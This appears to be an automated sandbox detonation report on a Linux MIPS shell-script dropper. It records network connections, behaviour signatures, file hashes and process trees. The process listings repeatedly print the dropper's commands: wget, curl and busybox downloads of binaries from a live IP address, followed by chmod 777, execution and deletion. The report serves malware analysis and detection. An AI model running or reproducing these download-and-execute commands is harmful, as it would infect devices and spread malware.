[/bin/busybox wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/chmod

[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd

[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/rm

[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/usr/bin/wget

[wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/chmod

[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo

[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/rm

[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/usr/bin/wget

[wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/chmod

[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj

[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/rm

[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/usr/bin/wget

[wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/chmod

[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC

[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/rm

[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/usr/bin/wget

[wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/chmod

[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH

[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/bin/rm

[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/usr/bin/wget

[wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/chmod

[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6

[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

/bin/rm

[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-28 03:22

Reported

2024-10-28 03:25

Platform

debian9-mipsel-20240611-en

Max time kernel

72s

Max time network

70s

Command Line

[/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d N/A
N/A /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h N/A
N/A /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae N/A
N/A /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd N/A
N/A /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 N/A
N/A /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i N/A
N/A /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u N/A
N/A /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv N/A
N/A /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd N/A
N/A /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo N/A
N/A /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj N/A
N/A /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC N/A
N/A /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH N/A
N/A /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 N/A
N/A /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d N/A
N/A /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h N/A
N/A /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae N/A
N/A /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd N/A
N/A /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 N/A
N/A /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i N/A
N/A /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u N/A
N/A /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv N/A
N/A /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd N/A
N/A /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo N/A
N/A /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj N/A
N/A /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC N/A
N/A /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH N/A
N/A /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h N/A
N/A N/A /bin/rm N/A
N/A N/A /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /usr/bin/curl N/A
File opened for modification /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /usr/bin/curl N/A
File opened for modification /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /usr/bin/curl N/A
File opened for modification /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /usr/bin/curl N/A
File opened for modification /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /usr/bin/curl N/A
File opened for modification /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /usr/bin/curl N/A
File opened for modification /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /usr/bin/curl N/A
File opened for modification /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /usr/bin/curl N/A
File opened for modification /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d /usr/bin/curl N/A
File opened for modification /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /usr/bin/curl N/A
File opened for modification /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /usr/bin/curl N/A
File opened for modification /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /usr/bin/curl N/A
File opened for modification /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /usr/bin/curl N/A
File opened for modification /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 /usr/bin/curl N/A
File opened for modification /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u /usr/bin/curl N/A
File opened for modification /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd /usr/bin/curl N/A
File opened for modification /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 /usr/bin/curl N/A
File opened for modification /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h /usr/bin/curl N/A
File opened for modification /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 /usr/bin/curl N/A
File opened for modification /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj /usr/bin/curl N/A
File opened for modification /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC /usr/bin/curl N/A
File opened for modification /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd /usr/bin/curl N/A
File opened for modification /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae /usr/bin/curl N/A
File opened for modification /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /usr/bin/curl N/A
File opened for modification /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv /usr/bin/curl N/A
File opened for modification /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo /usr/bin/curl N/A
File opened for modification /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH /usr/bin/curl N/A
File opened for modification /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i /usr/bin/curl N/A

Processes

/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh

[/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/chmod

[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d

[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/bin/rm

[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]

/usr/bin/wget

[wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/chmod

[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h

[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/bin/rm

[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]

/usr/bin/wget

[wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/chmod

[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae

[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/bin/rm

[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]

/usr/bin/wget

[wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/chmod

[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd

[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/bin/rm

[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]

/usr/bin/wget

[wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/chmod

[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20

[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/bin/rm

[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]

/usr/bin/wget

[wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/chmod

[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i

[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/bin/rm

[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]

/usr/bin/wget

[wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/chmod

[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u

[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/bin/rm

[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]

/usr/bin/wget

[wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/chmod

[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv

[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/bin/rm

[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]

/usr/bin/wget

[wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/chmod

[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd

[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/bin/rm

[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]

/usr/bin/wget

[wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/chmod

[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo

[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/bin/rm

[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]

/usr/bin/wget

[wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/chmod

[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj

[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/bin/rm

[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]

/usr/bin/wget

[wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/chmod

[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC

[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/bin/rm

[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]

/usr/bin/wget

[wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]

/usr/bin/curl
